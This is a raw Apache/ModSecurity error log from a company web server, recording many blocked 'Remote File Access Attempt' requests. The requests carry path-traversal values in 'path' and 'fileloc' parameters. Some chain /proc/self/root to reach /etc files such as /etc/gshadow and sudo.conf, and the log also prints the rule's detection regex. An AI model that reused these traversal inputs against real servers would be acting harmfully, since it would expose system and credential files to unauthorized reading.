[Thu Mar 19 11:45:34.443121 2026] [:error] [pid 15826:tid 140411658000128] [client 74.7.241.31:39516] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwMDuoXxyEfFpUF8f8UQAAAAUo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 11:45:34.446895 2026] [:error] [pid 17653:tid 140411607643904] [client 57.141.18.78:36738] [client 57.141.18.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/yum.conf.bkp-21-10-22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMDsdf6f5d65gmYZR-TAAAAtA"]
[Thu Mar 19 11:45:34.467088 2026] [:error] [pid 17887:tid 140411624429312] [client 57.141.18.24:36730] [client 57.141.18.24] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/centos-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMDQkwaGbbGflqUZDJ_AAAAM4"]
[Thu Mar 19 11:45:34.468934 2026] [:error] [pid 27293:tid 140411599251200] [client 57.141.18.16:36736] [client 57.141.18.16] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMDv-YZRR_7pZ7nDKSHgAAA9E"]
[Thu Mar 19 11:45:34.676374 2026] [:error] [pid 26799:tid 140411548894976] [client 74.7.243.128:49268] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwMDta6ubjKNq_cu4ZbwQAAA1c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 11:45:34.859528 2026] [:error] [pid 17887:tid 140411683178240] [client 57.141.18.121:36750] [client 57.141.18.121] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMDgkwaGbbGflqUZDJ_QAAAMc"]
[Thu Mar 19 11:45:35.966532 2026] [:error] [pid 14269:tid 140411699963648] [client 74.7.241.31:39522] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwMDwbLMZ6AikZjR9VjywAAAAU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 11:45:35.999537 2026] [:error] [pid 27403:tid 140411616036608] [client 57.141.18.105:36778] [client 57.141.18.105] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/iproute2"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMDxkFeYa1D6dYQnD3LgAAAc8"]
[Thu Mar 19 11:45:36.492074 2026] [:error] [pid 26799:tid 140411565680384] [client 57.141.18.2:36760] [client 57.141.18.2] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/wgetrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMENa6ubjKNq_cu4ZbxAAAA1U"]
[Thu Mar 19 11:45:36.748031 2026] [:error] [pid 30077:tid 140411716749056] [client 57.141.18.24:36766] [client 57.141.18.24] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/magic"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMEPu8EFLIOrSqIput6gAAAkM"]
[Thu Mar 19 11:45:37.098156 2026] [:error] [pid 17653:tid 140411557287680] [client 57.141.18.16:36796] [client 57.141.18.16] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sudo.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMEcdf6f5d65gmYZR-TQAAAtY"]
[Thu Mar 19 11:45:37.466589 2026] [:error] [pid 17653:tid 140411658000128] [client 74.7.241.31:43712] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwMEcdf6f5d65gmYZR-TgAAAso"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:45:37.671655 2026] [:error] [pid 15826:tid 140411557287680] [client 57.141.18.117:36814] [client 57.141.18.117] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/resolv.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMEeoXxyEfFpUF8f8UQgAAAVY"]
[Thu Mar 19 11:45:39.180840 2026] [:error] [pid 17653:tid 140411582465792] [client 57.141.18.42:36826] [client 57.141.18.42] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/nsswitch.conf.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMEsdf6f5d65gmYZR-TwAAAtM"]
[Thu Mar 19 11:45:39.181886 2026] [:error] [pid 26799:tid 140411716749056] [client 74.7.241.31:43726] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwMEta6ubjKNq_cu4ZbxQAAA0M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:45:39.184385 2026] [:error] [pid 17887:tid 140411557287680] [client 57.141.18.3:36830] [client 57.141.18.3] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/kdump.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMEgkwaGbbGflqUZDJ_wAAANY"]
[Thu Mar 19 11:45:39.203464 2026] [:error] [pid 30077:tid 140411733534464] [client 57.141.18.57:36836] [client 57.141.18.57] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwME_u8EFLIOrSqIput7AAAAkE"]
[Thu Mar 19 11:45:39.304734 2026] [:error] [pid 26799:tid 140411658000128] [client 57.141.18.64:36846] [client 57.141.18.64] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/nsswitch.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwME9a6ubjKNq_cu4ZbxgAAA0o"]
[Thu Mar 19 11:45:39.400652 2026] [:error] [pid 14269:tid 140411616036608] [client 57.141.18.114:36852] [client 57.141.18.114] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMEwbLMZ6AikZjR9VjzQAAAA8"]
[Thu Mar 19 11:45:40.068691 2026] [:error] [pid 17887:tid 140411582465792] [client 57.141.18.5:36864] [client 57.141.18.5] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/motd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMFAkwaGbbGflqUZDKAAAAANM"]
[Thu Mar 19 11:45:40.499474 2026] [:error] [pid 17887:tid 140411548894976] [client 57.141.18.58:36872] [client 57.141.18.58] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMFAkwaGbbGflqUZDKAgAAANc"]
[Thu Mar 19 11:45:40.552074 2026] [:error] [pid 19093:tid 140411708356352] [client 74.7.241.31:43734] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwMFF_V7PWP6ixUYl7DPQAAAoQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:45:41.175915 2026] [:error] [pid 27403:tid 140411658000128] [client 57.141.18.72:36890] [client 57.141.18.72] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMFRkFeYa1D6dYQnD3MAAAAco"]
[Thu Mar 19 11:45:41.274977 2026] [:error] [pid 17887:tid 140411641214720] [client 57.141.18.106:36868] [client 57.141.18.106] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMFQkwaGbbGflqUZDKAwAAAMw"]
[Thu Mar 19 11:45:41.738495 2026] [:error] [pid 17653:tid 140411708356352] [client 57.141.18.120:36892] [client 57.141.18.120] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/gshadow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMFcdf6f5d65gmYZR-UAAAAsQ"]
[Thu Mar 19 11:45:41.857440 2026] [:error] [pid 26799:tid 140411691570944] [client 74.7.241.31:43738] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwMFda6ubjKNq_cu4ZbyAAAA0Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:45:42.667090 2026] [:error] [pid 26799:tid 140411641214720] [client 57.141.18.75:36912] [client 57.141.18.75] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dnsmasq.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/acromion/cruorin013964198781.phtml"] [unique_id "abwMFta6ubjKNq_cu4ZbyQAAA0w"]
[Thu Mar 19 11:45:43.125801 2026] [proxy_fcgi:error] [pid 19093:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:35002] AH01075: Error dispatching request to : (polling)
